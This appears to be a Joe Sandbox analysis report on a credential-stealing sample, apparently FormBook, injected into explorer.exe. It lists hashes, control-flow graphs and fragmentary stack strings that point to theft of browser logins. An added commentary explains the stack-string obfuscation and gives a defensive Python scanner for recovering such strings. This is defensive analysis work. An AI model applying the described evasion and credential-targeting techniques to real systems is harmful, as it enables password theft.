                                                                                                                                            • Instruction ID: f91b5bccbc548fd9f86220b2d1f03bdad56d82cbaee0704aeee5f20da9cddf14
                                                                                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                            • Instruction Fuzzy Hash: CE418B74918A088FCB84EFA8C8997AD77E0FB58301F44417AD84ADB259DE309945CB96

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID: .dll$el32$kern
                                                                                                                                            • API String ID: 1964310414-1222553051
                                                                                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                            • Instruction ID: 8ddca7850dc21c0570e04c33a4c51182df5c2f4f81a696c448e5e1807aca566c
                                                                                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                            • Instruction Fuzzy Hash: A1417974918A088FCB84EFA8C889BAD77F0FB68301F44417AD84EDB255DE309945CB95

                                                                                                                                             Control-flow Graph
                                                                                                                                             • Basic blocks (recovered from the graph export): [289] 10dc072e-10dc0768; [290] 10dc0788-10dc07ab connect; [291] 10dc076a-10dc0782 call 10dc3942
                                                                                                                                             • Edges: 289->290, 289->291, 291->290
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: connect
                                                                                                                                            • String ID: conn$ect
                                                                                                                                            • API String ID: 1959786783-716201944
                                                                                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                            • Instruction ID: d6ffccd20d6c9468f1a14f2ac9f15aa457ec023a68aaa2def9c30a6d3e5ce387
                                                                                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                            • Instruction Fuzzy Hash: CB015E30618B188FCB84EF1CE088B55B7E0FB59314F1546AEE90DCB266CA74D9818BC2

                                                                                                                                             Control-flow Graph
                                                                                                                                             • Basic blocks (recovered from the graph export): [294] 10dc0732-10dc0768; [295] 10dc0788-10dc07ab connect; [296] 10dc076a-10dc0782 call 10dc3942
                                                                                                                                             • Edges: 294->295, 294->296, 296->295
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: connect
                                                                                                                                            • String ID: conn$ect
                                                                                                                                            • API String ID: 1959786783-716201944
                                                                                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                            • Instruction ID: a73417ea0cbfc18e1b8b751281e7cdd0448635732e6c238483d463d26e08ee87
                                                                                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                            • Instruction Fuzzy Hash: F5012170618A1C8FCBC4EF5CE048B5577E0FB59315F1541AEA80DCB266CA74D9818BC2

                                                                                                                                             Control-flow Graph
                                                                                                                                             • Basic blocks (recovered from the graph export): [407] 10dc06b2-10dc06e5; [408] 10dc0705-10dc072d send; [409] 10dc06e7-10dc06ff call 10dc3942
                                                                                                                                             • Edges: 407->408, 407->409, 409->408
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: send
                                                                                                                                            • String ID: send
                                                                                                                                            • API String ID: 2809346765-2809346765
                                                                                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                            • Instruction ID: 96cfdb963ce0102681923fc862a28a5908502bba9b6a6f5f242e3827e1c42d2e
                                                                                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                            • Instruction Fuzzy Hash: 83012570518A1C8FDBC8DF1CD049B1577E0FB58314F1646AEE85DCB266CA70D881CB81

                                                                                                                                             Control-flow Graph
                                                                                                                                             • Basic blocks (recovered from the graph export): [412] 10dc05b2-10dc05ea; [413] 10dc05ec-10dc0604 call 10dc3942; [414] 10dc060a-10dc062b socket
                                                                                                                                             • Edges: 412->413, 412->414, 413->414
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: socket
                                                                                                                                            • String ID: sock
                                                                                                                                            • API String ID: 98920635-2415254727
                                                                                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                            • Instruction ID: 59c3eb225dabba2611ffaa3c27c91122d663a7dba8e5db162ac9f18c338a968e
                                                                                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                            • Instruction Fuzzy Hash: 9F01447061861C8FC784DF1CD048B54BBE0FB59354F1545AEE45ECB266C7B0C981CB86

                                                                                                                                             Control-flow Graph
                                                                                                                                             • Basic blocks (recovered from the graph export): [417] 10db82dd-10db8320 call 10dc3942; [420] 10db83fa-10db840e; [421] 10db8326; [422] 10db8328-10db8339 SleepEx; [423] 10db833b-10db8341; [424] 10db834b-10db8352; [425] 10db8343-10db8349; [426] 10db835c-10db836a call 10dc2f12; [427] 10db8370-10db8376; [428] 10db8354-10db835a; [430] 10db8378-10db837e; [431] 10db83b7-10db83bd; [432] 10db83bf-10db83cf call 10db8e72; [433] 10db83d4-10db83db; [435] 10db8380-10db838a; [437] 10db83e1-10db83f5 call 10db80f2; [438] 10db838c-10db83b1 call 10db9432
                                                                                                                                             • Edges: 417->420, 417->421, 421->422, 422->422, 422->423, 423->424, 423->425, 424->427, 424->428, 425->424, 425->426, 426->427, 427->430, 427->431, 428->426, 428->427, 430->431, 430->435, 431->432, 431->433, 432->433, 433->422, 433->437, 435->431, 435->438, 437->422, 438->431
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                            • Instruction ID: c49aa5eea7d2671269d9b4b61192e325b1d127b63c5d5c4781f6dddfeb24ecb0
                                                                                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                            • Instruction Fuzzy Hash: BC3169B4A04B49DFDB94EF29808A295F7E0FB56300F48427EC91ECB206CB74A450CFA1

                                                                                                                                             Control-flow Graph
                                                                                                                                             • Basic blocks (recovered from the graph export): [453] 10db8412-10db8446 call 10dc3942; [456] 10db8448-10db8472 call 10dc5c9e CreateThread; [457] 10db8473-10db847d
                                                                                                                                             • Edges: 453->456, 453->457
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                            • Instruction ID: b7a7e6dc25f4e39cf196d19c57544de96bc9803a7d8e6930fadd7031ef1c1387
                                                                                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                            • Instruction Fuzzy Hash: FCF04634228B080FD788EF2CD44263AF3D0FBE9200F40063EA58DC3264CE38C5828716
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                            • API String ID: 0-393284711
                                                                                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                            • Instruction ID: f597629c414e81af4998a49b0638caff56b1659257c3297ed998d071f4522d6e
                                                                                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                            • Instruction Fuzzy Hash: A1E16F74518F488FC765EFA4C4847AAB7E0FF58300F504A2EA59BCB256DF38A505CB85
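The String IDs above are not whole strings but 4-byte fragments: "kern$el32$.dll", "user$32.d$ll", "wini$net.$dll" in this function, "conn$ect", "sock" and "send" in the socket wrappers, and "Subm$itUR$encr$ypte$dPas$swor$..." in the credential-harvesting function. That is the signature of stack strings: the DLL or API name is written to the stack one dword at a time, so no complete name exists in the image or in a plain strings dump. The socket/connect/send wrappers each show a conditional call to 10dc3942 immediately before the API, which is consistent with the name being assembled and then resolved on first use (an inference from the control-flow graphs, not something the report states). The fragments of the last function line up with Firefox logins.json key names such as encryptedPassword and formSubmitURL; that too is an inference from the fragment list. The following Python scanner is an added example, not part of the Joe Sandbox report or of the sample: it recovers such stack strings from raw code bytes by finding runs of dword writes with printable immediates, ordering them by stack slot and joining them. It assumes the three encodings commented in the code (identical in 32- and 64-bit mode) and uses byte-wise resync instead of a real disassembler; the sample bytes are constructed inline and are not taken from the analysed binary.

```python
"""
Recover FormBook-style stack strings from raw code bytes (added example).

The malware writes each string onto the stack one dword at a time, so the
report sees only fragments such as "kern", "el32", ".dll".  This scanner
finds runs of such dword writes, orders them by stack slot and joins them.
The sample bytes at the bottom are constructed here, not dumped from the
analysed sample.
"""
import struct
from typing import List, Optional, Tuple

# Encodings handled (same bytes in 32- and 64-bit mode; bitness of the
# dumped region is assumed not to matter for these forms):
#   C7 45 disp8 imm32      mov dword ptr [ebp+disp8], imm32
#   C7 44 24 disp8 imm32   mov dword ptr [esp+disp8], imm32
#   68 imm32               push imm32
Insn = Tuple[int, str, Optional[int], bytes]  # (length, kind, disp, imm)


def _decode_at(code: bytes, i: int) -> Optional[Insn]:
    """Decode one of the three recognised instructions at offset i, or None."""
    if code[i:i + 2] == b"\xC7\x45" and len(code) >= i + 7:
        return 7, "ebp", struct.unpack("b", code[i + 2:i + 3])[0], code[i + 3:i + 7]
    if code[i:i + 3] == b"\xC7\x44\x24" and len(code) >= i + 8:
        return 8, "esp", struct.unpack("b", code[i + 3:i + 4])[0], code[i + 4:i + 8]
    if code[i:i + 1] == b"\x68" and len(code) >= i + 5:
        return 5, "push", None, code[i + 1:i + 5]
    return None


def _is_text(imm: bytes) -> bool:
    """True for printable ASCII, allowing NUL padding such as b'dll\\0'."""
    return any(imm) and all(b == 0 or 0x20 <= b < 0x7F for b in imm)


def _join(run: List[Tuple[str, Optional[int], bytes]]) -> List[str]:
    """Order the fragments of one run by where they land on the stack."""
    if run[0][0] == "push":
        frags = [imm for _, _, imm in reversed(run)]   # last push = lowest address
    else:
        frags = [imm for _, _, imm in sorted(run, key=lambda r: r[1])]
    return [p.decode("ascii") for p in b"".join(frags).split(b"\0") if p]


def recover_stack_strings(code: bytes, min_len: int = 4) -> List[str]:
    """Return the stack strings found in code, in code order.

    A run is a sequence of back-to-back text-dword writes using one
    addressing form; any other byte, a non-text immediate (e.g. a zero
    dword used as terminator) or a change of form ends it.  Byte-wise
    resync on unknown bytes is a deliberate simplification.
    """
    found: List[str] = []
    run: List[Tuple[str, Optional[int], bytes]] = []

    def flush() -> None:
        if run:
            found.extend(s for s in _join(run) if len(s) >= min_len)
            run.clear()

    i = 0
    while i < len(code):
        insn = _decode_at(code, i)
        if insn is None:
            flush()
            i += 1
            continue
        length, kind, disp, imm = insn
        if _is_text(imm) and (not run or run[0][0] == kind):
            run.append((kind, disp, imm))
        else:
            flush()
            if _is_text(imm):          # text, but a different addressing form
                run.append((kind, disp, imm))
        i += length
    flush()
    return found


def _mov_ebp(disp: int, frag: bytes) -> bytes:
    """Assemble `mov dword ptr [ebp+disp], frag` (helper for the sample only)."""
    return b"\xC7\x45" + struct.pack("b", disp) + frag


# Constructed sample: kernel32.dll and wininet.dll built in ebp-relative
# slots (the first terminated by a zero dword), then "connect" built by two
# pushes in reverse order.  Not bytes from the analysed sample.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"                                          # push ebp; mov ebp, esp
    + _mov_ebp(-0x10, b"kern") + _mov_ebp(-0x0C, b"el32")
    + _mov_ebp(-0x08, b".dll") + _mov_ebp(-0x04, b"\0\0\0\0")
    + b"\x33\xC0"                                            # xor eax, eax
    + _mov_ebp(-0x20, b"wini") + _mov_ebp(-0x1C, b"net.") + _mov_ebp(-0x18, b"dll\0")
    + b"\x68ect\0" + b"\x68conn"                             # push 'ect\0'; push 'conn'
    + b"\xC3"                                                # ret
)

if __name__ == "__main__":
    for s in recover_stack_strings(SAMPLE_CODE):
        print(s)
```

Run against a memory dump such as the 10CE0000 region listed above, the scanner yields the reassembled DLL and API names that the String ID lines only show in pieces; the min_len threshold and the contiguity rule are what keep random immediates out of the result.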
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: fad9b7e1954622c6e2fec7b4aec950593f23cf5ec5dbd60e0b79037c26c04825
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 3CB18F30518B488FDB55EFA8C485AEEB7F1FF58300F50461EE59ACB252EF7894098B85
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
• Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction ID: ac32ae1dcb5187b4791ddaec67ffe1b9aa58cd1dd450e38ec03cc67554cf4599
• Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction Fuzzy Hash: 6741B470A18B08CFDB14DF88A8456BD7BF2FB48700F44025EE509DB246DBB99D498BD6
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
• API String ID: 0-355182820
• Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction ID: a1648c8bd58740f3c07ee50e76ed49239526066bef4cf601d96b89dab5acc64e
• Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction Fuzzy Hash: 4CC16B75218B098FC759EFA4C4856DAF3E1FB94304F40472EA59ACB211DF38A619CBC6
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$0$c$n$r$r$r$r$r$r$r$r
• API String ID: 0-97273177
• Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction ID: 67a6a0723bffdb24f9ca4d3345fe502f8a2903016f0a7db40b0fc8cecdc3da8f
• Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction Fuzzy Hash: 4951E8315187488FD71ADF54D4812AAB7E5FBC4700F50192EF9CBCB252DBB8950ACB82
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction ID: b24fd372408fd901122a56eec2e67924c740266cec3d19b2a52d933b4f60ecf2
• Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction Fuzzy Hash: 14C18370618B194FC758EFA8D495AEAF3E1FB94300F904329A54ECB256DF38A909C7C5
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction ID: a78a153cac72e410da8541b03ebae218ddd6260bc37c209f5daa3652547df006
• Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction Fuzzy Hash: 76C18370618B194FC758EFA8D4956EAF3E1FB94300F904329A54ECB256DF38A909C7C5
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction ID: 2e291af16d33d65201e84a57222bd9ed5a4e494a4dbab34719ebfdd1cefca005
• Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
• Instruction Fuzzy Hash: 02A18F706187488FDB29EFA8D4447EEB7E1FB88300F40462DE58ADB252EE7895498785
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
• Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction ID: d2a2eb2ef3394bd3299260e4257dfaa1cc57914f88c724de06b4b7a4e8a1e82d
• Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
• Instruction Fuzzy Hash: A59180706187488FDB29EFA8D4447EEB7E1FB88300F40462DE54ADB252EF789549C785
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: $.$e$n$v
• API String ID: 0-1849617553
• Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction ID: 48464e8e5d2f0e42540aa61605420e89b71bb26a265d50a4a77a9991607b814f
• Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
• Instruction Fuzzy Hash: 1571A7316187498FD754EFA8C4847AAB7F5FF54304F00062EE54ACB261EF79D9498781
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2.dl$dll$l32.$ole3$shel
• API String ID: 0-1970020201
• Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction ID: 188089aa8b2b9d6b1a95adcbfcc47b61b44855cd6cdfe984ad367f4f21c9b762
• Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
• Instruction Fuzzy Hash: BE5180B0914B4C8FDB65EFA4C0846EEB7F1FF58300F40462EA59AE7215EF3495458B89
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4$\$dll$ion.$vers
• API String ID: 0-1610437797
• Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
• Instruction ID: b44adf1a02620ef9e892cc44668039223df135a8669a05fd82f876cfb2002368
• Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
• Instruction Fuzzy Hash: EB418330228B488FCB75EF6498457EA77E4FB99301F40462EAA4ECB241EF35D5098782
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: 32.d$cli.$dll$sspi$user
• API String ID: 0-327345718
• Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
• Instruction ID: e3c3e70e62d330d536ed5b994a132ecc80fba3115d7dce0fe9822c44d6e68727
• Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
• Instruction Fuzzy Hash: 18415234A18F0D8FCB94EFA8C0947ED77E6FB98300F54456AA90EDB211DA78D5448BC5
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$el32$h$kern
• API String ID: 0-4264704552
• Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
• Instruction ID: 8d301300572f3fac0c95b3384ad5c55176f1fc6b9e4841113df654c624760508
• Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
• Instruction Fuzzy Hash: 68419270608B488FDB69DF6880843AAF7E1FBD8301F504A2FA59EC7256DB74D549CB81
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: $Snif$f fr$om:
• API String ID: 0-3434893486
• Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
• Instruction ID: 81035076ddfacb03700b7e9ddfa7c134b03adc75d688153ec3eb4beaf7c58582
• Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
• Instruction Fuzzy Hash: A531053150CB885FD71AEB68C4846DAB7D0FB94300F50491EE59BCB252EF38A549CB43
Strings
Memory Dump Source
• Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
Similarity
• API ID:
• String ID: $Snif$f fr$om:
• API String ID: 0-3434893486
• Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                            • Instruction ID: d3237c3641558138eb09b540c2fa9ba2fd33db93471954f9e284ec4ebf117a0c
                                                                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                            • Instruction Fuzzy Hash: 6331E371508B486FD719EB68C4846EAB7D4FB94300F40491EE59BCB252EF38E54ACB43
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                            • Instruction ID: e32ac1df2d0c701cdc7ae2e33ba47b8b22a0a30c65a10b9dd7107016c4c52a5e
                                                                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                            • Instruction Fuzzy Hash: 5E317030118B184FC794EFA89494BAAB7E1FBD8300F94462DA94ECB256DF38D549C752
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                                                                            • API String ID: 0-3136806129
                                                                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                            • Instruction ID: 6f7f9f718079c3d5bceac5a6b7c0c7fedb5b0b9c8ca36f5f09efc3bb06b09a55
                                                                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
